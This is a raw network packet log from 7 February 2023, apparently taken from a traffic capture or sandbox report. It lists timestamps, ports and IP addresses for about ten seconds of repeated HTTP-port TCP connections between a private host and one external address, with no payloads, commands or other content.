Feb 7, 2023 20:00:18.206909895 CET	80	50407	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.207031012 CET	50407	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.313684940 CET	50407	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.314325094 CET	50408	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.374171019 CET	80	50407	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.374258995 CET	50407	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.374646902 CET	80	50408	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.374754906 CET	50408	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.376565933 CET	50408	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.437047958 CET	80	50408	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.439316988 CET	80	50408	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.439793110 CET	50408	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.550668001 CET	50408	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.551296949 CET	50409	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.611474037 CET	80	50408	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.611578941 CET	50408	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.613642931 CET	80	50409	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.613753080 CET	50409	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.614092112 CET	50409	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.675647020 CET	80	50409	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.677609921 CET	80	50409	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.677723885 CET	50409	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.783389091 CET	50409	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.784045935 CET	50410	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.844728947 CET	80	50410	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.844825029 CET	50410	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.845032930 CET	80	50409	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.845093966 CET	50409	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.845590115 CET	50410	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:18.907526016 CET	80	50410	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.909425974 CET	80	50410	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:18.909569025 CET	50410	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.235673904 CET	50410	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.238656044 CET	50411	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.296559095 CET	80	50410	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:19.296706915 CET	50410	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.300503969 CET	80	50411	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:19.300681114 CET	50411	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.306269884 CET	50411	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.368556023 CET	80	50411	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:19.371829033 CET	80	50411	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:19.371939898 CET	50411	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.517803907 CET	50411	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.518567085 CET	50412	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.580097914 CET	80	50411	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:19.580256939 CET	50411	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.581964970 CET	80	50412	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:19.582088947 CET	50412	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.610272884 CET	50412	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.672091007 CET	80	50412	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:19.674258947 CET	80	50412	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:19.676548958 CET	50412	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.831723928 CET	50412	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.832819939 CET	50413	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.894447088 CET	80	50412	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:19.895525932 CET	80	50413	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:19.895648003 CET	50412	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.895675898 CET	50413	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:19.937794924 CET	50413	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:20.000715971 CET	80	50413	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:20.002024889 CET	80	50413	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:20.002253056 CET	50413	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:20.738651991 CET	50413	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:20.739332914 CET	50414	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:20.800003052 CET	80	50414	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:20.800163031 CET	50414	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:20.800585985 CET	50414	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:20.800875902 CET	80	50413	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:20.800962925 CET	50413	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:20.862158060 CET	80	50414	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:20.865380049 CET	80	50414	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:20.865509033 CET	50414	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:21.001012087 CET	50414	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:21.001709938 CET	50415	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:21.063020945 CET	80	50414	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:21.063112020 CET	80	50415	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:21.063150883 CET	50414	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:21.063210011 CET	50415	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:21.209012032 CET	50415	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:21.269917011 CET	80	50415	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:21.273582935 CET	80	50415	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:21.273756027 CET	50415	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:21.381848097 CET	50415	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:21.382488966 CET	50416	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:21.442893028 CET	80	50415	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:21.443082094 CET	50415	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:21.446897984 CET	80	50416	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:21.447138071 CET	50416	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.006473064 CET	50416	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.068659067 CET	80	50416	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:22.072938919 CET	80	50416	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:22.073101997 CET	50416	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.444149971 CET	50416	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.445080996 CET	50417	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.504785061 CET	80	50417	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:22.504980087 CET	50417	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.505445957 CET	80	50416	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:22.505553007 CET	50416	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.516623974 CET	50417	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.576499939 CET	80	50417	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:22.578718901 CET	80	50417	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:22.578865051 CET	50417	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.787879944 CET	50417	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.788557053 CET	50418	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.848172903 CET	80	50417	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:22.848347902 CET	50417	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.850048065 CET	80	50418	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:22.850222111 CET	50418	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.859106064 CET	50418	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:22.920464039 CET	80	50418	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:22.922579050 CET	80	50418	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:22.922739983 CET	50418	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.054815054 CET	50418	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.055768967 CET	50419	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.116221905 CET	80	50418	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.116410017 CET	50418	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.118299961 CET	80	50419	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.118535042 CET	50419	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.118933916 CET	50419	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.181425095 CET	80	50419	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.184972048 CET	80	50419	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.185091972 CET	50419	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.298769951 CET	50419	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.299768925 CET	50420	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.361135006 CET	80	50420	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.361308098 CET	80	50419	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.361344099 CET	50420	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.361442089 CET	50419	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.363085032 CET	50420	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.424359083 CET	80	50420	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.426568031 CET	80	50420	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.426709890 CET	50420	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.535806894 CET	50420	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.536536932 CET	50421	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.596826077 CET	80	50421	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.596921921 CET	50421	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.597297907 CET	50421	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.597342014 CET	80	50420	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.597420931 CET	50420	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.657572985 CET	80	50421	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.660217047 CET	80	50421	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.660320044 CET	50421	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.767781019 CET	50421	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.768850088 CET	50422	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.828227043 CET	80	50421	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.829341888 CET	80	50422	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.829519987 CET	50421	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.829611063 CET	50422	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.830240965 CET	50422	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:23.890603065 CET	80	50422	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.892877102 CET	80	50422	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:23.896964073 CET	50422	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.002547026 CET	50422	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.003448009 CET	50423	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.063882113 CET	80	50422	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.064100027 CET	50422	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.066009045 CET	80	50423	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.066986084 CET	50423	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.067699909 CET	50423	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.129443884 CET	80	50423	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.133294106 CET	80	50423	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.136993885 CET	50423	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.263689041 CET	50423	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.264288902 CET	50424	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.323673010 CET	80	50424	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.325047016 CET	50424	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.325531960 CET	80	50423	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.325922012 CET	50424	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.325995922 CET	50423	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.385364056 CET	80	50424	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.387582064 CET	80	50424	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.387680054 CET	50424	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.501746893 CET	50424	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.502450943 CET	50425	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.562604904 CET	80	50424	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.565030098 CET	50424	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.565654039 CET	80	50425	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.567018032 CET	50425	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.567398071 CET	50425	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.628787041 CET	80	50425	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.631149054 CET	80	50425	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.631381035 CET	50425	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.737643957 CET	50425	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.739335060 CET	50426	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.799285889 CET	80	50425	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.799474001 CET	50425	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.800770044 CET	80	50426	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.800950050 CET	50426	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.801296949 CET	50426	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.862736940 CET	80	50426	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.865047932 CET	80	50426	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:24.865216017 CET	50426	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.970746040 CET	50426	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:24.971590042 CET	50427	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.032335997 CET	80	50427	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.032484055 CET	50427	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.032850027 CET	50427	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.032915115 CET	80	50426	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.032988071 CET	50426	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.093447924 CET	80	50427	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.098226070 CET	80	50427	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.098356009 CET	50427	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.204752922 CET	50427	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.205427885 CET	50428	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.267088890 CET	80	50427	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.267175913 CET	50427	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.267285109 CET	80	50428	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.267369032 CET	50428	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.267782927 CET	50428	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.329376936 CET	80	50428	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.331684113 CET	80	50428	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.331816912 CET	50428	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.439081907 CET	50428	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.439737082 CET	50429	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.500154018 CET	80	50429	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.500278950 CET	50429	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.500636101 CET	80	50428	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.500721931 CET	50429	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.500756025 CET	50428	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.561181068 CET	80	50429	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.563906908 CET	80	50429	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.563994884 CET	50429	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.674410105 CET	50429	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.675663948 CET	50430	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.736597061 CET	80	50429	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.736809969 CET	50429	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.738969088 CET	80	50430	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.739161015 CET	50430	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.739837885 CET	50430	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.802345991 CET	80	50430	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.804398060 CET	80	50430	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.804500103 CET	50430	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.908081055 CET	50430	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.908854961 CET	50431	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.970668077 CET	80	50430	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.970866919 CET	50430	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.971179008 CET	80	50431	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:25.971324921 CET	50431	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:25.972242117 CET	50431	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.034714937 CET	80	50431	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.037997961 CET	80	50431	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.038083076 CET	50431	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.152740002 CET	50431	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.153695107 CET	50432	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.215034962 CET	80	50432	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.215229034 CET	50432	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.215533972 CET	50432	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.216224909 CET	80	50431	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.216293097 CET	50431	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.276757002 CET	80	50432	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.280097008 CET	80	50432	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.280201912 CET	50432	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.397968054 CET	50432	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.398652077 CET	50433	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.459815025 CET	80	50432	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.459929943 CET	50432	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.460947990 CET	80	50433	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.461071014 CET	50433	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.461663008 CET	50433	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.523531914 CET	80	50433	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.525734901 CET	80	50433	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.525846004 CET	50433	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.644330978 CET	50433	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.652101040 CET	50434	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.706214905 CET	80	50433	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.706341028 CET	50433	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.714098930 CET	80	50434	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.717184067 CET	50434	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.717538118 CET	50434	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.778755903 CET	80	50434	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.781004906 CET	80	50434	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.781188011 CET	50434	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.894996881 CET	50434	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.896761894 CET	50435	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.956407070 CET	80	50435	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.956485987 CET	80	50434	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:26.956698895 CET	50434	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.956711054 CET	50435	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:26.957151890 CET	50435	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.016602039 CET	80	50435	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.019088984 CET	80	50435	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.019265890 CET	50435	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.127275944 CET	50435	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.128626108 CET	50436	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.186969995 CET	80	50435	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.188638926 CET	50435	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.191185951 CET	80	50436	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.193274975 CET	50436	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.196537018 CET	50436	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.259115934 CET	80	50436	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.262902021 CET	80	50436	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.263087034 CET	50436	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.377573013 CET	50436	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.378423929 CET	50437	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.438060045 CET	80	50437	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.438188076 CET	50437	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.438497066 CET	50437	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.440088034 CET	80	50436	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.440179110 CET	50436	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.497859001 CET	80	50437	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.500554085 CET	80	50437	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.503597021 CET	50437	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.611464024 CET	50437	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.612241983 CET	50438	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.672070026 CET	80	50437	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.672204971 CET	50437	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.675156116 CET	80	50438	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.675275087 CET	50438	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.675587893 CET	50438	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.738641024 CET	80	50438	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.740813017 CET	80	50438	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.740998030 CET	50438	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.848006010 CET	50438	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.849231005 CET	50439	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.909732103 CET	80	50438	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.909905910 CET	50438	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.910839081 CET	80	50439	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.911027908 CET	50439	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.911911011 CET	50439	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:27.974371910 CET	80	50439	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.977287054 CET	80	50439	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:27.977498055 CET	50439	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.080488920 CET	50439	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.081449986 CET	50440	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.142936945 CET	80	50439	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.143127918 CET	80	50440	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.143177032 CET	50439	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.143254995 CET	50440	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.144248962 CET	50440	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.206057072 CET	80	50440	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.210213900 CET	80	50440	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.210413933 CET	50440	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.314424992 CET	50440	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.315263033 CET	50441	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.374968052 CET	80	50441	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.375214100 CET	50441	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.375722885 CET	50441	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.376041889 CET	80	50440	62.204.41.4	192.168.2.5
Feb 7, 2023 20:00:28.376250982 CET	50440	80	192.168.2.5	62.204.41.4
Feb 7, 2023 20:00:28.435055971 CET	80	50441	62.204.41.4	192.168.2.5
